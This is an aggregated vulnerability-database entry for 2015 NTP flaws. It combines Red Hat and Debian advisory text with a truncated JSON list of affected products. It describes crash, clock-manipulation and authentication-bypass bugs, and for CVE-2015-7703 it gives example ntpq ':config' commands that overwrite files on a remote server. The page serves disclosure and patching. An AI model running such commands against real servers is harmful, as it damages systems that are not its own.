ppc64: ntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm sntp-4.2.6p5-22.el7.ppc64.rpm
ppc64le: ntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm sntp-4.2.6p5-22.el7.ppc64le.rpm
s390x: ntp-debuginfo-4.2.6p5-22.el7.s390x.rpm sntp-4.2.6p5-22.el7.s390x.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: ntp-4.2.6p5-22.el7.src.rpm
x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-9297 https://access.redhat.com/security/cve/CVE-2014-9298 https://access.redhat.com/security/cve/CVE-2014-9750 https://access.redhat.com/security/cve/CVE-2014-9751 https://access.redhat.com/security/cve/CVE-2015-1798 https://access.redhat.com/security/cve/CVE-2015-1799 https://access.redhat.com/security/cve/CVE-2015-3405 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD4DBQFWTkFJXlSAg2UNWIIRAphzAKCRHDVdHI5OvJ8glkXYLBwyQgeyvwCYmTV3 1hLTu5I/PUzWOnD8rRIlZQ== =sWdG -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce. An attacker could use a specially crafted package to cause ntpd to crash if:
- ntpd enabled remote configuration
- The attacker had the knowledge of the configuration password
- The attacker had access to a computer entrusted to perform remote configuration
Note that remote configuration is disabled by default in NTP.
CVE-2015-5194
It was found that ntpd could crash due to an uninitialized
variable when processing malformed logconfig configuration
commands.
CVE-2015-5195
It was found that ntpd exits with a segmentation fault when a
statistics type that was not enabled during compilation (e.g.
timingstats) is referenced by the statistics or filegen
configuration command
CVE-2015-5219
It was discovered that sntp program would hang in an infinite loop
when a crafted NTP packet was received, related to the conversion
of the precision value in the packet to double.
CVE-2015-5300
It was found that ntpd did not correctly implement the -g option:
Normally, ntpd exits with a message to the system log if the offset
exceeds the panic threshold, which is 1000 s by default. This
option allows the time to be set to any value without restriction;
however, this can happen only once. If the threshold is exceeded
after that, ntpd will exit with a message to the system log. This
option can be used with the -q and -x options.
ntpd could actually step the clock multiple times by more than the
panic threshold if its clock discipline doesn't have enough time to
reach the sync state and stay there for at least one update. If a
man-in-the-middle attacker can control the NTP traffic since ntpd
was started (or maybe up to 15-30 minutes after that), they can
prevent the client from reaching the sync state and force it to step
its clock by any amount any number of times, which can be used by
attackers to expire certificates, etc.
This is contrary to what the documentation says. Normally, the
assumption is that an MITM attacker can step the clock more than the
panic threshold only once when ntpd starts and to make a larger
adjustment the attacker has to divide it into multiple smaller
steps, each taking 15 minutes, which is slow.
CVE-2015-7691, CVE-2015-7692, CVE-2015-7702
It was found that the fix for CVE-2014-9750 was incomplete: three
issues were found in the value length checks in ntp_crypto.c, where
a packet with particular autokey operations that contained malicious
data was not always being completely validated. Receipt of these
packets can cause ntpd to crash.
CVE-2015-7701
A memory leak flaw was found in ntpd's CRYPTO_ASSOC.
CVE-2015-7703
Miroslav Lichvar of Red Hat found that the :config command can be
used to set the pidfile and driftfile paths without any
restrictions. A remote attacker could use this flaw to overwrite a
file on the file system with a file containing the pid of the ntpd
process (immediately) or the current estimated drift of the system
clock (in hourly intervals). For example:
ntpq -c ':config pidfile /tmp/ntp.pid'
ntpq -c ':config driftfile /tmp/ntp.drift'
In Debian ntpd is configured to drop root privileges, which limits
the impact of this issue.
CVE-2015-7704
If ntpd as an NTP client receives a Kiss-of-Death (KoD) packet
from the server to reduce its polling rate, it doesn't check if the
originate timestamp in the reply matches the transmit timestamp from
its request. An off-path attacker can send a crafted KoD packet to
the client, which will increase the client's polling interval to a
large value and effectively disable synchronization with the server.
CVE-2015-7850
An exploitable denial of service vulnerability exists in the remote
configuration functionality of the Network Time Protocol. A
specially crafted configuration file could cause an endless loop
resulting in a denial of service. An attacker could provide a the
malicious configuration file to trigger this vulnerability.
CVE-2015-7852
A potential off by one vulnerability exists in the cookedprint
functionality of ntpq. A specially crafted buffer could cause a
buffer overflow potentially resulting in null byte being written out
of bounds.
CVE-2015-7855
It was found that NTP's decodenetnum() would abort with an assertion
failure when processing a mode 6 or mode 7 packet containing an
unusually long data value where a network address was expected. This
could allow an authenticated attacker to crash ntpd.
CVE-2015-7871
An error handling logic error exists within ntpd that manifests due
to improper error condition handling associated with certain
crypto-NAK packets. An unauthenticated, off-path attacker can force
ntpd processes on targeted servers to peer with time sources of the
attacker's choosing by transmitting symmetric active crypto-NAK
packets to ntpd. This attack bypasses the authentication typically
required to establish a peer association and allows an attacker to
make arbitrary changes to system time.
For the oldstable distribution (wheezy), these problems have been fixed in version 1:4.2.6.p5+dfsg-2+deb7u6.
For the stable distribution (jessie), these problems have been fixed in version 1:4.2.6.p5+dfsg-7+deb8u1.
For the testing distribution (stretch), these problems have been fixed in version 1:4.2.8p4+dfsg-3.
For the unstable distribution (sid), these problems have been fixed in version 1:4.2.8p4+dfsg-3.
We recommend that you upgrade your ntp packages
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201510-0706", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "ntp", "scope": "eq", "trust": 1.6, "vendor": "ntp", "version": "4.2.8" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "7" }, { "model": "ntp", "scope": "lt", "trust": 1.0, "vendor": "ntp", "version": "4.2.8" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "7.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "9.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "ntp", "scope": "gte", "trust": 1.0, "vendor": "ntp", "version": "4.2.0" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "apple", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "cisco", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "efficientip", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "f5", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "freebsd", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "huawei", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ntp", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "omniti", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "red hat", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "watchguard", "version": null }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sigmablade em card (n8405-043) firmware rev.14.02 before" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "nv7500/nv5500/nv3500 series" }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": "4.2.8p1" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ne single model / cluster model ver.002.08.08 previous version" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "nv7400/nv5400/nv3400 series" }, { "model": "securebranch", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "version 3.2" }, { "model": "ntp", "scope": "lt", "trust": 0.8, "vendor": "ntp", "version": "4.x" }, { "model": "univerge", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "3c cmm" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56003" }, { "model": "network time protocol 4.2.7p10", "scope": null, "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "physical access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.3" }, { "model": "flex system p260 compute node 01af783 030", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "(7895-23x)783.20:" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "flex system p260 compute node 01af783 027", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-23x)783.11:" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.09" }, { "model": "flex system chassis management module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "nsm series appliances", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "flex system p260 compute node 01af783 022", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.01:" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.211" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "linux enterprise server sp1 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "infosphere balanced warehouse c4000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "flex system p24l compute node 01af783 026", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.10:" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "security proventia network multi-function security system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.08" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.214" }, { "model": "network time protocol 4.2.7p11", "scope": null, "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.0.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.1" }, { "model": "smartcloud entry fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.19" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.10.3" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.08" }, { "model": "vgw", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "flex system p270 compute node 01af783 021", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7954-24x)783.00:" }, { "model": "qlogic virtual fabric extension module for ibm bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.3" }, { "model": "infosphere balanced warehouse c3000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "flex system p260 compute node 01af783 021", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-23x)783.00:" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "nsmxpress 2012.2r10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system p260 compute node 01af783 021", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.00:" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.8.01.00" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "video delivery system recorder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.213" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.1" }, { "model": "flex system p260 compute node 01af783 027", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.11:" }, { "model": "flex system p270 compute node 01af783 026", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7954-24x)783.10:" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.113" }, { "model": "videoscape back office", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56002" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.11" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "76000" }, { "model": "ds8700 r6.3 sp9", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "videoscape conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.010" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.22" }, { "model": "flex system p24l compute node 01af783 030", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "783.20:" }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "junos os", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "network configuration and change management service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.110" }, { "model": "smartcloud entry fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.413" }, { "model": "telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13100" }, { "model": "flex system p24l compute node 01af783 022", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.01:" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "flex system p460 compute node 01af783 027", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-42x)783.11:" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.2" }, { "model": "ucs invicta series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56001" }, { "model": "flex system p260 compute node 01af783 030", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "783.20:" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.0" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.00" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.5" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "flex system p260 compute node 01af783 027", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-22x)783.11:" }, { "model": "flex system p460 compute node 01af783 021", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-43x)783.00:" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.6" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.3" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "security access manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "infosphere balanced warehouse c4000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "flex system p260 compute node 01af783 022", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-23x)783.01:" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "ds8870 r7.2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "flex system p270 compute node 01af783 022", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7954-24x)783.01:" }, { "model": "flex system p460 compute node 01af783 030", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "(7895-42x)783.20:" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.3" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.7" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.8" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "flex system p460 compute node 01af783 021", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-42x)783.00:" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77100" }, { "model": "flex system p460 compute node 01af783 030", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "(7895-43x)783.20:" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "webex social", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "scos", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "flex system p24l compute node 01af783 027", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.11:" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "flex system p460 compute node 01af783 027", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-43x)783.11:" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77000" }, { "model": "flex system p270 compute node 01af783 030", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "(7954-24x)783.20:" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.32" }, { "model": "flex system p260 compute node 01af783 030", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "(7895-22x)783.20:" }, { "model": "infosphere balanced warehouse c3000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "flex system p260 compute node 01af783 026", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-22x)783.10:" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.2" }, { "model": "qlogic virtual fabric extension module for ibm bladecenter", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0.3.16.00" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "ironport encryption appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "smartcloud entry fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.415" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "common services platform collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "telepresence tx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.10" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.0" }, { "model": "flex system p460 compute node 01af783 026", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-43x)783.10:" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "flex system p260 compute node 01af783 022", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-22x)783.01:" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.1.0" }, { "model": "network time protocol 4.2.8p1", "scope": "ne", "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "virtual security gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.21" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.09" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.6" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "flex system manager", "scope": 